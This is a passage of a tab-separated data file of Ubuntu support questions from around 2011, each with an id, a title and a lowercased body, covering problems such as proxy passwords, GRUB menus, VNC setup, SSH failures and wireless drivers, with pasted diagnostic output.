the top right portion as the indicators appear . this is how i want it ideally . is there a way to recreate this ? some settings under compiz , gdm/gnome or unity , or whatever i have to tweak to get this behaviour ? thank you ! : ) *note : as indicated above , i am on natty with unity
60209	have either empathy or ekiga sip clients use ipv6 instead of messing with nat ?	how can i get either empathy or ekiga to work over ipv6 so i can avoid all the complexity of dealing with nat ?
60212	desktop version to server migration	i have installed ubuntu desktop 10.10 and lamp server and i am using it for past 6 months . and i never use that computer for anything else.. now i feel like removing unwanted components like media programs , open office etc which is not needed for a server . but i would like to keep the gui just as a option for ease of use.. will there be any problem if i remove those components . i dont want to install server edition from the beginning..
60217	apt-get update with an @ in password error	i want to update ubuntu 11.04 throught apt-get . so i added the following lines in apt.conf export http_proxy=http : //username : password @ proxyserver.net : port/ export ftp_proxy=http : //username : password @ proxyserver.netport/ export http_proxy=http : //deepak : deepak @ 123 @ 12.1.1.1:3128 my question is : how do i insert special characters to a username or password ? for instance : my password for proxy is deepak @ 123 and it is getting an error .
60218	how to add a directory to my path ?	how do i add a directory to my $ path in ubuntu and make the changes permanent ?
60226	overlay scrollbars in gtk apps under kde	i want t try overlay scrollbars in eclipse . i am using kde . how do i enable overlay scrollbars in gtk apps under kde ?
60227	nautilus is extremely slow	i am on ubuntu 11.04 . and nautilus is very slow . it opens directories for 3-5 seconds even if a directory contains just a few small files . even selecting of a file or directory with narrow keys is extremely slow and it rises my cpu usage up to 100 % . it makes it almost unusable . but i noticed that if i start my nautilus as superuser : $ gksu nautilus then it works just fine . it is fast and responsive . so what can i do to fix this ? any help is really appreciated .
60228	how to remove all files from a directory ?	the closest i 've gotten is # rm /path/to/directory/* . * but that does n't work for files that do n't have an extension ...
60230	set wireless automatically to connect my network	how i can make automatically wireless connect to my network , because first of all it always tries another one and only after this it connect to correct one , or it is impossible ?
60232	how to make nautilus recognize emblems changed from the command line	i am trying to write myself a nautilus script . i need to change emblems of files in this script . i discovered how to do the same from here . i however see that the changed emblems are not reflected in the nautilus browser until i reboot ( i am going to presume that this means that a restart of nautilus is required ) . is there i way i can do this any other way ? by other way i mean without restarting nautilus , like how the emblems are changed instantly when done through `` right click - > properties - > emblems '' ?
60233	when i try to add repositories , why are ubuntu 's keyservers timing-out ?	something is rendering receiving keys from keyserver.ubuntu.com impossible and i 'm not even sure where to begin in trying to resolve this . as an example , we 'll use the spotify linux app found here : http : //www.spotify.com/us/download/previews/ sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 4e9cff4e executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv-keys 4e9cff4e gpg : requesting key 4e9cff4e from hkp server keyserver.ubuntu.com gpg : keyserver timed out gpg : keyserver receive failed : keyserver error to be clear , though , this has nothing to do with spotify . the same result comes from every one of my attempts to grab keys from ubuntu . there is something wrong on my side . as always , any help in tracking this down would be appreciated . prior to submitting this , i 've discovered that the problem is with my dns and/or router . currently i have my router configured to use google dns ( 8.8.8.8 / 8.8.4.4 ) and in my router logs i 'm receiving a flood of dns errors . the following is an excerpt : ( gmt-06:00 ) 02:48:10 tue sep 06 2011 syslog : failed dns request len=145 , srcip=8.8.4.4 , url=_pgpkey-http._tcp.keyserver.ubuntu.com ( gmt-06:00 ) 02:48:12 tue sep 06 2011 syslog : no response for dns request to server 68.94.156.1 yet . ( gmt-06:00 ) 02:48:14 tue sep 06 2011 syslog : no response for dns request to server 68.94.157.1 yet . ( gmt-06:00 ) 02:48:14 tue sep 06 2011 syslog : failed dns request len=83 , srcip=192.168.0.1 , url=keyserver.ubuntu.com.domain.actdsltmp ( gmt-06:00 ) 02:48:14 tue sep 06 2011 syslog : all dns servers tried , no response . ( gmt-06:00 ) 02:48:14 tue sep 06 2011 syslog : failed dns request len=158 , srcip=8.8.4.4 , url=keyserver.ubuntu.com.domain.actdsltmp ( gmt-06:00 ) 02:49:02 tue sep 06 2011 syslog : failed dns request len=145 , srcip=8.8.4.4 , url=_pgpkey-http._tcp.keyserver.ubuntu.com ( gmt-06:00 ) 02:49:05 tue sep 06 2011 syslog : no response for dns request to server 68.94.156.1 yet . ( gmt-06:00 ) 02:49:07 tue sep 06 2011 syslog : failed dns request len=158 , srcip=8.8.4.4 , url=keyserver.ubuntu.com.domain.actdsltmp ( gmt-06:00 ) 02:49:08 tue sep 06 2011 syslog : no response for dns request to server 68.94.157.1 yet . ( gmt-06:00 ) 02:49:08 tue sep 06 2011 syslog : failed dns request len=83 , srcip=192.168.0.1 , url=keyserver.ubuntu.com.domain.actdsltmp ( gmt-06:00 ) 02:49:08 tue sep 06 2011 syslog : all dns servers tried , no response . very confused . i 'm not even sure if i 'm posting this on the correct stackexchange site now .
60237	how do i set up the touchpad of a lenovo x121e	i am using a laptop lenovo x121e ( amd-version ) . the laptop has a synaptics touchpad/trackpoint combination . the touchpad is very `` jumpy '' when trying to tap the pad for a mouse click . normal mouse movement is fine but when i try to tap the touchpad the pointer often moves away a few dots . similar behaviour has been reported by windows-users of the x121e , here a solution is to install the latest driver from synaptics . i have n't found a similar solution for ubuntu ( 11.04 , 64 bit ) .
60238	running a 64bit executable on a 64 ubuntu lucid	i have an ubuntu 10.04 64bit , and i 'm trying to launch a 64 bit executable with no luck : ./lmrand1 -bash : ./lmrand1 : no such file or directory ls -la lmrand1 -rwxr-xr-x 1 ysagon ysagon 191872 2011-09-05 18:13 lmrand1 file lmrand1 lmrand1 : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses sharedlibs ) , for gnu/linux 2.6.9 , stripped i 'm on a 64 bit ubuntu as well : uname -a linux dev 2.6.32-33-server # 72-ubuntu smp fri jul 29 21:21:55 utc 2011 x86_64 gnu/linux the executable is not corrupted , i 'm able to launch it on a redhat enterprise . does someone know what is going on . edit : sorry i have forgot to put the output of ldd ldd lmrand1 linux-vdso.so.1 = > ( 0x00007fffabdff000 ) libpthread.so.0 = > /lib/libpthread.so.0 ( 0x00007fe8d176c000 ) libm.so.6 = > /lib/libm.so.6 ( 0x00007fe8d14e9000 ) libgcc_s.so.1 = > /lib/libgcc_s.so.1 ( 0x00007fe8d12d1000 ) libc.so.6 = > /lib/libc.so.6 ( 0x00007fe8d0f4e000 ) libdl.so.2 = > /lib/libdl.so.2 ( 0x00007fe8d0d4a000 ) /lib64/ld-lsb-x86-64.so.3 = > /lib64/ld-linux-x86-64.so.2 ( 0x00007fe8d19a4000 )
60239	mysql upgrade options for 11.04 ?	as of yesterday i have brought up a new website running on ubuntu 11.04 ( on linode ) . the customer was unhappy with the previous vendor and i have brought across their django site , moving from python 2.6 to python 2.7 in the process . everything else is pretty much the same and i 'm using the default apache2 and mysql packages on 11.04 unfortunately , there seems to be a problem with mysql . twice today , mysql went ballistic and started using all available cpu . which of course brings everything to a crawl . i restarted the mysql service and all continued happily for many hours afterwards . i 'm running mysql 5.1.54 . it seems 5.5 is unlikely to be packaged for a while . is there anywhere i can get later mysql packages for an easy install ? i 'm hoping that whatever this bug is , it will be squashed in a later version of mysql .
60240	view lvm paritions in windows 7	im trying to browse in windows an old harddisk that i got , but its a lvm patition . how can i see a partition that is ext3/4 or part of lvm partition in windows ? anyone can recommend on a tool ?
60241	can not connect to network with laptop	i ca n't connect to network via an ethernet cable , but the wireless connection works fine . this only happens on this laptop - the pc network cable connection is fine . ifconfig eth0 link encap : ethernet hwaddr my mac address inet6 addr : my inet6 address scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4 errors:0 dropped:0 overruns:0 frame:0 tx packets:24 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1296 ( 1.2 kb ) tx bytes:5733 ( 5.7 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1584 errors:0 dropped:0 overruns:0 frame:0 tx packets:1584 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:49690 ( 49.6 kb ) tx bytes:49690 ( 49.6 kb ) wlan0 link encap : ethernet hwaddr d0 : df:9a : be : b7:0a inet addr:46.237.123.248 bcast:46.237.123.255 mask:255.255.255.0 inet6 addr : 2a02:6800:0:125 : d2df:9aff : febe : b70a/64 scope : global inet6 addr : fe80 : :d2df:9aff : febe : b70a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:58300 errors:0 dropped:0 overruns:0 frame:0 tx packets:1857 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5518132 ( 5.5 mb ) tx bytes:380517 ( 380.5 kb )
60243	developer studio for ubuntu	is there any developer tool that is released by canonical for ubuntu like the visual studio for windows which is released by microsoft . if no which is the best gui application development tool for ubuntu .
60249	why does ubuntu ask to check my hard drives every so often ?	recently , i 've been compelled to restart my computer a lot . when i boot , ubuntu now starts scanning my hard drives for errors , but assures me that i can cancel if i want by pressing 'c ' . why does ubuntu do this ? if it 's necessary , why is it something i can cancel ? if it 's not necessary , why force me to do it ? on what basis is the number of restarts decided ?
60256	internet connection in oneiric	main problem i am unable to connect to the internet from ubuntu 11.10 . additional info i am trying to connect using a 3g usb modem via a mobile broadband connection . country : south africa provider : cell c before upgrading to 11.10 , the same internet connection worked flawlessly in ubuntu 11.04 , but presented the same problem in ubuntu 10.10 . additional reading what happened ? so i decided to be brave and upgrade natty to 11.10 beta . the upgrade manager read the package lists , fetched new packages and then installed the upgrades completely before abruptly stopping and saying that the upgrade has been aborted . i clicked ok and then a new box showed up saying that the upgrade has completed , but with some errors . so i restarted my computer . greeted by the lightdm screen , i logged in as usual . i received an annoying error saying that a system program has encountered an error . after searching google , i found a solution that fixed that . then i had nautilus errors where nautilus had encountered errors and was forced to close . i also had an error saying that the modem manager has encountered an error and has closed . after trying dpkg -- configure commands i figured from the error message that 2 packages were missing . one was libatk-adaptor and the other was some python package . i could not connect to the internet all the while so i loaded the live cd of 11.04 , downloaded the packages , rebooted ubuntu , installed those packages and whoop whoop ! no more errors . however i still can not connect to the internet ! my 3g usb modem is recognized , i set up the connection as usual and then click on the network indicator , select my connection , the indicator flashes for a while before displaying a notification that the network is disconnected . so what have i tried ? i tried using my phone as a modem ( worked well in 11.04 ) . -- > same error . i downloaded the modem manager 0.5 using the live cd and then rebooted in ubuntu , uninstalled the modem manager and then reinstalled it , -- > still the same problem . my plea so basically without internet my ubuntu system is dead . what 's interesting is that with the final release of ubuntu 10.10 i have exact same problem . i get the same problem when trying to connect to the internet . it seems only natty works in connecting to the internet . now i 'm a fairly new ubuntu user . started using ubuntu in april this year when natty was released so i do n't know that much . what do i do ? how can i get to connect to the internet using oneiric ?
60257	moved hdd to another server and networking wont work	had to move hard disks from one server to another . system boots fine and i can access the command line of the server from the console . however the networking seems broken . the /etc/network/interface file still has the same static ip setup as before . the link light is on on the nic but i just can not get it to ping out and am unable to ping the server . pinging the loopback works fine so networking is running . using lshw -class network i can see the device i have connected listed . am i missing something obvious here or am i going to have to reinstall ( which does need to be done at some stage due to some other mistakes i have made oops )
60261	what gparted alternatives are available ?	what is a good partitioning tool for ubuntu 10.x as an alternative to gparted ? i have n't been able to find one that is easy to use . a commercial product is ok if necessary for ease of use .
60262	system hangs when opening a large openoffice file	the file size is of 50 mb ( openoffice file ) . while opening the file the system hangs completely . processor : core 2 duo ram : 1 gb hdd : 250 gb os : ubuntu 10.10 note : i have tried libreoffice too . i experience the same problem both in openoffice and in libreoffice . any other alternative way to open the file ?
60267	how do i change the channels in pavelcontrol ?	i had this problem in 10.04 and it was solved . pavucontrol was the solution the last time , i muted one channel and the microphone worked then . but now in ubuntu 11.04 i have to change both channels at the same time . as the screenshot shows . so here is my problem . i ca n't use my built in microphone in skype , but in windows i can . skype -version gave : skype 2.2.0.35
60269	`` message did not receive a reply '' browsing ipad 2	i 've installed libimobiledevice and wanted to browse through my ipad 2 4.3.5 ios . but i get this error : dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) a solution for ubuntu 10.10 , running sudo apt-get update dist-upgrade , did n't work .
60270	web mail client setup for postfix server	i have an ubuntu server with postfix installed . how can i set up a simple webmail package , so i can send email from a web interface to and from the local accounts and gmail ?
60272	ignore timestamp when installing a package with dpkg ?	i 'm working with two virtualized servers which keep time extremely poorly for some reason , so that one is always a little bit ahead of the other ( up to 2 seconds ) . the problem i 'm having is that i build packages on the one `` in the future '' , and then the other machine refuses to install them . the build-upload-install is one step , so i could potentially just add a delay , but i 'd prefer not to . is there a way to tell dpkg to just ignore the timestamp ? the error message looks like this : [ exec ] command : sudo /usr/bin/dpkg -i /home/deploy/media/media_2011-09-06_100724.deb [ exec ] error : tar : ./control : time stamp 2011-09-06 10:07:47 is 2.68160212 s in the future [ exec ] tar : ./control-template : time stamp 2011-09-06 10:07:46 is 1.681412205 s in the future [ exec ] tar : ./postinst : time stamp 2011-09-06 10:07:46 is 1.681347869 s in the future [ exec ] tar : . : time stamp 2011-09-06 10:07:47 is 2.681313485 s in the future ( it 's part of an ant script )
60273	2tb harddrive with lvm grub error	i installed ubuntu 11.04 on a 2 terabyte hard drive . after the install process i get a strange error : `` error : no such partitionâ grub rescue ... is ubuntu unable to support 2tb hard disks ? do i need to reinstall it ?
60276	installing gstreamer ugly multiverse removes gstreamer ugly	i installed gstreamer ugly plugins , and then later when i installed gstreamer ugly multiverse plugin it removed the gstreamer ugly plugins . later when i tried to open a .rm file on banshee it asked for gstreamer ugly plugins and installed it , but removed the gstreamer ugly multiverse plugins . how can i keep both plugins ? why is this conflict happening ?
60277	what is the meaning of ./ before a given path ?	i 've been told to run this : ./yiic message ./app/messages/config.php but i do n't understand the ./ meaning , can anyone clarify please . note : believe me , we ca n't google that . i 've tried : ./ meaning ./ ubuntu it was the same as nothing . : (
60278	how do i get the grub menu to display ?	i 've been having this issue with my hp dv7t laptop . i fixed it using the recommended option : set grub_cmdline_linux_default= '' quiet splash radeon.modeset=0 '' and run update-grub . however , that caused a different problem . before , even though ubuntu would go into a blank screen , the grub menu would always show . now , grub loads ( i know that since switching the `` beep on load '' option works ) , but i do n't see the menu , or anything else , until the timeout is hit and the default option boots . this makes the system workable , but i do n't like not having a recovery option and not having a grub menu in general . there are no other oss on the system , it 's a clean install of ubuntu natty 64 bit . hitting shift after grub loads does n't help . how do i get the grub menu to show up ?
60282	why are some application windows ( including firefox , nautilus & syn.pack.mgr ) completely blank after a fresh install ?	just installed 11.04 , switched to ubuntu classic at the login screen . now several applications do not display properly . affected apps include firefox , nautilus and synaptic package manager . in them all the window is completely blank apart from the title bar . the menu bar is present as i can pull down menus using alt+f . in firefox the form is present as the cursor changes from pointer to i-beam to hand etc . but i can not see anything . i switched back to unity and all seems well . i would like to go back to classic as i am having trouble finding things in unity .
60285	how to cross-compile open-zwave library for asus rt-n16 ?	open-zwave lib link : http : //code.google.com/p/open-zwave/source/browse/ toolchain used : http : //code.google.com/p/wl500g/downloads/list ? can=3 & q=hndtools-mipsel-uclibc-4.4.6-k26 asus rt-n16 running on wl500g firmware : http : //code.google.com/p/wl500g/ i 've tried to do the following : added toolchain path : path= $ path : /home/user/hndtools-mipsel-uclibc-4.4.6-k26/bin/ ńhecked out all needed files : svn checkout http : //open-zwave.googlecode.com/svn/trunk/ open-zwave added cross_compile = mipsel-linux- to /open-zwave/cpp/build/linux/makefile tried to make : ~/open-zwave/cpp/build/linux $ make got error : ../../hidapi/linux/hid.c:40:26 : error : linux/hidraw.h : no such file or directory replaced gcc with mipsel-linux-gcc , g++ with mipsel-linux-g++ at /home/user/open-zwave/cpp/hidapi/linux/makefile tried to make hidapi : ~/open-zwave/cpp/hidapi/linux $ make got another error : hid-libusb.c:44:19 : error : iconv.h : no such file or directory how to cross-compile that ?
60288	how to use the dash to search for files on other drives ?	i am new to ubuntu and it 's promising . my question is how can i use it to search for files like i could in the start menu of windows 7 ? presently it just shows some file names if they were used very recently and in the present session . is this a problem because my files ( mostly music ) are on a different drive than the one in which ubuntu is installed ?
60289	why ca n't i open files and locations across a home network ?	i have figured out how to get my two ubuntu 11.04 machines to see each other , and i can look through shared files but when i go to open say a song in a shared music file i get an error message saying could not open location , you might not have permission to open the file . i have set the file permissions to let it be both read and write . but it still will not let me listen to the song .
60291	why is ubuntu one synchronization not working ?	many days ubuntuone synchronisation is not working . i have ubuntu 11.04 amd64 . if i do this then : javier @ pc-ubuntu : ~ $ u1sdtool -- status state : local_rescan connection : not user with network description : doing local rescan is_connected : false is_error : false is_online : false queues : working javier @ pc-ubuntu : ~ $ ps -c ubuntuone-syncdaemon pid tty time cmd javier @ pc-ubuntu : ~ $ u1sdtool -- connect javier @ pc-ubuntu : ~ $ ps -c ubuntuone-syncdaemon pid tty time cmd 3240 ? 00:00:03 ubuntuone-syncd javier @ pc-ubuntu : ~ $ u1sdtool -- status state : local_rescan connection : not user with network description : doing local rescan is_connected : false is_error : false is_online : false queues : working javier @ pc-ubuntu : ~ $ ps -c ubuntuone-syncdaemon pid tty time cmd what can i do ? i have a plan music streaming with 20g storage , but i do n't happy because very days ubuntuone synchronisation not working for me .
60292	how do i install the ssh2 extensions of php ?	i want to be able to run php functions like ssh2_connect . but , those functions are not available on my machine . what do i need to do to install them ? i am using ubuntu 8.04 hardy heron .
60295	will arkose be installed by default in 11.10 ?	i think i read that arkose be installed by default in 11.10 somewhere on the canonical blog . if you do n't know what it is , see http : //www.stgraber.org/category/arkose/
60298	how do i properly set up and secure a production lamp server ?	it 's very hard to find comprehensive information on this subject . either i found short tutorials on how you perform the installation , as simple as `` apt-get install apache2 '' , or outdated tutorials . so i was hoping i could get some professional information from my fellow members of the ubuntu community : d i have performed a normal ubuntu server 11.04 with lamp , samba and ssh installed through the system installation . but i 'm having some trouble setting up virtual hosts and to make the system secure enough to expose the server to the web . i 've somewhat followed this tutorial this far . i have 3 sites in /etc/apache2/sites-available which all looks like this except for different site names : < virtualhost example.com > serveradmin webmaster @ localhost serveralias www.edunder.se documentroot /var/www/sites/example customlog /var/log/apache2/www.example.com-access.log combined < /virtualhost > and i have enabled them with the command a2ensite so i have symbolic links in /etc/apache2/sites-enabled . my /etc/hosts file has these lines : 127.0.0.1 localhost 127.0.1.1 ubuntu.lan ubuntu 127.0.0.1 localhost.localdomain localhost example.com www.example.com 127.0.0.1 localhost.localdomain localhost example2.com www.example2.com 127.0.0.1 localhost.localdomain localhost example3.com www.example3.com and i can only access one of them from the browser ( i have lynx installed on the server for testing purposes ) so i guess i have n't set them up properly : ) how should i proceed to get a secure and proper setup ? i also use mysql and i think that this tutorial will be enough to set up ssh securely . please help me understanding apache configuration better since i 'm new to setting up my own server ( i 've only run xampp earlier ) and please advise regarding how i should setup a firewall as well : d
60299	desktop not showing after playing with compiz	having successfully installed ubuntu 11.04 i decided to look into improving look and feel of the unity desktop . i could find no option to introduce any nice effects with the standard install , but a google session suggested compiz would do the job . i installed this and selected the `` wobbly windows '' option and this worked fine . after a while i thought i 'd try some of the other available effects ( ca n't remember which but may have been cube desktop ) but this resulted in no windows showing at all . i now have just blank wall paper with no icons or menus . there are no error messages and right clicking the desktop produces a small context menu but nothing else . rebooting brings me back to a blank desktop with just wallpaper . i do not know where to start .
60300	how do i download and install the wireless card driver for a toshiba a215 laptop ?	i have been searching for a while on how to do this , but am unable to get anywhere . here is the wireless card i have : *-network description : wireless interface product : ar5001 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:14:00.0 logical name : wlan0 version : 01 serial : 00:1b:9e : bd:23:2c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=2.6.38-11-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:19 memory : f8200000-f820ffff
60308	how detect and run a shell script when any file or folder is being copied/moved to a directory ?	how can i detect any file or folder is being copied/moved to a directory and then run a shell script ? the files copied/moved would mostly have the same file names as the existing ones ...
60311	markdown , latex combined in wysiwyg editor . is there any ?	i really like the way markdown is implemented in se bunch of sites , where i can easily write code blocks , performing formatting or even use latex on some of sites like writing $ \pi $ . i also like how this online editor looks and feels . but it 's all online . is there any offline wysiwyg analogs of notepag or wmd in ubuntu that optionally supports pdf as an output format ? both markdown and latex desired . i desire to simultaneously use markdown and latex . i 'm planing to use an editor for writing some technical stuff with math , but it 's annoying to be constantly in `` latex-mode '' . so it would be awesome to immerse in latex when i need formulas and use markdown when i need to speak on natural language . upd . almost all answers was quite useful , but none of them answers directly on my question . i 'll accept @ n.n . answer as a most complete .
60312	why do my windows disappear when i move them to different workspaces ?	for example : i open some file with evince ( in default workspace 1 ) then i right-click on window titlebar and select `` move to workspace 2 '' what happens is that evince window disappears from workspace 1 , but it ca n't be found in any workspace . process is running , as i can confirm with system monitor . in compizconfig i ca n't find any option describing workspaces , to none for customizing workspaces ( like do n't show on launcher if not in current workspace - but that 's another story ) . i can only find some settings with gconf-editor - under metacity there is option to set number of workspaces ( currently set to 4 ) and that 's the number of workspaces shown when i click on `` workspace switcher '' icon on launcher so , i would like to solve this problem somehow with your help .
60317	how do i reset gnome to the defaults ?	i installed gnome from a kubuntu 11.04 installation using apt-get $ apt-get install gnome-desktop-environment everything was working just fine until i decided to change the panel format . then a tried to fix it following both those instructions , with no success : how do i reset gnome to the defaults ? how do i reset my unity configuration ? nothing is working inside gnome now , not even alt+f2 i tried to uninstall and install it again , and i tried to install unity too . any ideas in how to solve this issue ?
60324	how to synchronize a palm pda with evolution 2.32.2	the solution provided for 10.10 and evolution 2.30 does n't seem to work because the 'âenable-pilot-conduits ' option is no longer recognized : configure : warning : unrecognized options : -- enable-pilot-conduits is there any other solution ? many thanks in advance , -- marc
60329	not all files are available after sync	i have one folder set to sync automatically , and only a select number of the files are available via cloud . also the files that are available have a green check-mark on them , whereas the ones that are n't available have a looping set of arrows ( green and yellow ) when i look back at the folder content . any reason why all my files are n't available ? tkss
60331	how do i install unity 3-d web player ?	i want to install the unity 3-d web player on ubuntu 11.04 . i would like to use it on different sites such as http : //firecraft.games2be.com/play . is it possible ?
60337	not all songs synching on my android smartphone when using banshee	i have multiple playlists ( about 2k songs ) in banshee that i want to sync with my android smartphone ( motorola milestone ) . the sync worked flawlessly from the start to the end but after looking at the result i noticed that some songs were missing on the android device . after looking closer to the problem i saw that only songs that had a special characters in the name ( & , / , + . etc ) were not synched . are there other people having this problem and has anyone found a solution ? preferably one that does not consist in changing song names : )
60338	why does my system get stuck at the splash screen after updating to gnome 3 ?	im a newbie to linux and today i installed gnome-shell and i had previously installed nvidea current drivers provided by ubuntu . after reboot it shows ubuntu splash screen and then stays there and does n't do anything . i then went in cli mode using alt+f1 and from there i ran command startx . then it loads and then crashes and shows a message saying some error has occured and gives a logout button . i tried dpkg-reconfigure xserver-xorg but nothing has happened . can anyone please give me solution for this ?
60340	why does my thinkpad x220 screen get garbled after a while ?	i am running 11.04 desktop 64bit on my thinkpad x220 which is brand new . i ran windows on it for a few days and that seemed to run fine . it 's still on there on a separate partition . ubuntu installed ok , with no major issues except that my screen gets garbled at irregular intervals . the way in which it gets garbled is not consistent -- see example screens below -- and i have found no way to reproduce it . it never happens straight after bootup , it seems to mostly occur after a day of work . i can keep working , everything responds like there is nothing wrong , except i ca n't see what i 'm doing anymore . needless to say this is hyper annoying . before i send the laptop back to get it repaired or replaced , i would like to try and find out if this even a hardware problem or if it 's traceable to ubuntu . it does not seem to happen under windows but then i rarely boot into windows .
60342	how to install and setup smokeping ?	any have good link to how to for smokeping that is upto date for 10.10 or 10.04 ( aka mint11 ) ?
60343	my pc does not ask password in login even if i set it to ask on login	when i first installed ubuntu 11.04 i marked not to ask password in login . then , ofcourse , it did n't ask me password on login . but now i want the os to ask login password as i have many critical datas stored . i changed the settings to password : asked in login but it does n't work . my ubuntu does n't ask password in login . what should i do now ?
60350	putty works but ssh from terminal fails after ssh2_msg_kexinit	i have had problems connecting with ssh through the terminal to different machines around my workplace and my home . the three last lines is ( if i run ssh with -vvv ) : debug3 : load_hostkeys : loaded 0 keys debug1 : ssh2_msg_kexinit sent read from socket failed : connection reset by peer there is no problem with the network , because putty works perfectly with the exact same server . also , if i sit down with my colleagues machine ( also ubuntu , same version as mine , 11.04 ) , it works like a charm from the terminal . i have tried to delete my .ssh . so i guess something else is wrong , anything i can do to uninstall and reinstall or delete to reset this ? edit : i found a duplicate : http : //serverfault.com/questions/265244/ssh-client-problem-connection-reset-by-peer
60351	ubuntu 11.04 launcher	i have searched the net and found out that the launcher is not movable . with widescreen format it makes perfect sense to have the launcher vertically than horizontally . but , the folks at the ubuntu developer community are left handed , i guess ! the majority of the world works with right hand and thus i am stating to develop neck pain using the left aligned launcher . now there is no-way to change it is a bit non sense as the os is open source . there is definitely one gentleman who could release a patch to move the launcher to the right . other than that it is making perfect sense .
60353	set mouse click action in the center of the mouse pointer , not the top left corner	is there any way to alter the mouse pointer 's action region ? i have a circle pointer with a dot in the center , and i want the mouse to start the action click from there , not from the top left corner , is there anyway to setup this behavior ?
60357	why did my middle mouse button stop working in firefox exclusively ?	for some reason i 'm plagued by especially rare bugs . this time my middle mouse button ceased to work in firefox exclusively . i can use it to copy stuff in terminal or to start another instance of a program clicking on the program 's icon on the unity launcher bar . but i ca n't use my middle mouse button to open a link in a new tab . that 's quite annoying . the button click gets recognized , as the links highlight as i middle click them . a new tab just is n't opened . i already disabled all addons to firefox to see if it 's an addon problem . turns out it 's not . even purging firefox and reinstalling did n't help . i own a logitec mx510 mouse on my hp laptop that also has synaptics touchpad . on the touchpad the middle and left button never worked in ubuntu at all ( firefox or anywhare else ) . any ideas what could be wrong ? what else could i try . edit : now the problem has reached my work pc as well . after the latest firefox-update ( to version 6.0.2 ) : the right mouse button on my work pc ( desktop ) does open the context menu , but as soon as i move my mouse even the tiniest bit , the menu closes . so the problems might be related to the 6.0.2 update of firefox or not , but it 's certainly suspicious that both pc have mouse problems ins firefox only .
60358	how do i set vnc server so that on system reboot it is auto started ?	i was trying to make a vnc server in my ubuntu 11.04 , which can allow me to login even system reboots . therefore , i have tried as following , but from vncviewer i ca n't connect . server listening install $ sudo -s # apt-get install vnc4server xinetd security # vncpasswd /root/.vncpasswd password : verify : as a service # vim /etc/xinetd.d/xvnc service xvnc { type = unlisted disable = no socket_type = stream protocol = tcp wait = yes user = root server = /usr/bin/xvnc server_args = -inetd :1 -query localhost -geometry 1024x768 -depth 16 -once -fp /usr/share/x11/fonts/misc -disconnectclients=0 -nevershared passwordfile=/root/.vncpasswd port = 5901 } start the service # service xinetd stop # service xinetd start client trying $ vncviewer 192.168.1.125:1 tigervnc viewer for x version 1.0.90 - built may 10 2011 10:04:22 copyright ( c ) 2002-2005 realvnc ltd . copyright ( c ) 2000-2006 tightvnc group copyright ( c ) 2004-2009 peter astrand for cendio ab see http : //www.tigervnc.org for information on tigervnc . wed sep 7 10:08:20 2011 cconn : connected to host 192.168.1.125 port 5901 main : read : connection reset by peer ( 104 )
60362	is there a way that unity can remember which terminal window had focus and was raised ?	i use a lot of terminal windows ( at least three , up to 5 or 6 ) . if i am working in one of them , and switch to another app via the unity launcher ( say the web browser ) , and then come back to the terminal windows by clicking on the terminal icon in the unity launcher , the window that had focus and was raised is not raised anymore and may or may not still have focus . this is really annoying as i have to dig under all the other terminal windows i do not want to finally find and click on the one i do want . is there a way that unity can remember which terminal window had focus and was raised ? update : thanks to everyone , but as far as i 'm concerned this is a bug in unity
60364	can i run a remote x session in windowed mode ?	i want to run a remote x session in windowed mode . i can not find any help in the manual of x , nor in the internet . does anyone know how to do that ? by now i 'm doing : x :2 -query hostname thanks in advance
60371	see in nautilus which videos have already been watched	is there any possibility to see in nautilus or nautilus elementary which videos in my video folder have already been watched ?
60373	animals popping up randomly	there are pictures of animals that are popping up randomly on my computer . when i move the mouse over the animal it turns into a a sword icon , and when i click it , the animal disappears but after a few minutes another animal comes up . i think it may be related to chromium but i 'm not sure . what is this and how can i get rid of it ?
60379	how to combine two commands as a launcher ?	i want to combine these two commands : rvm use 1.9.2 and redcar and combine them to run as a standalone program . but when i created a launcher with these two commands inputted , separated by semicolon , it just does n't work . how to implement this function ?
60386	how do the ifconfig settings work ?	i have $ ifconfig eth0 link encap : ethernet hwaddr 00:1f : d0:99 : ea : a9 inet addr:192.168.1.130 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21f : d0ff : fe99 : eaa9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:309399 errors:0 dropped:0 overruns:0 frame:0 tx packets:262110 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:312968243 ( 312.9 mb ) tx bytes:35445808 ( 35.4 mb ) interrupt:44 lo link encap : локальная петля ( loopback ) inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4175 errors:0 dropped:0 overruns:0 frame:0 tx packets:4175 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:975196 ( 975.1 kb ) tx bytes:975196 ( 975.1 kb ) but : $ cat /etc/network/interfaces auto lo iface lo inet loopback how ifconfig show me settings for eth0 ? where are settings store ? upd : i do not use networkmanager , and i have lxde , not gnome
60387	any suggestions for list of supported streaming audio/video server ?	any suggestions for list of ubuntu supported streaming server ; i looked at some like zeya red5 gstreamer ffmpeg icecast-server / icecast2 i wanted know list of all robust or lightweight multi-user streaming server for video and audio .
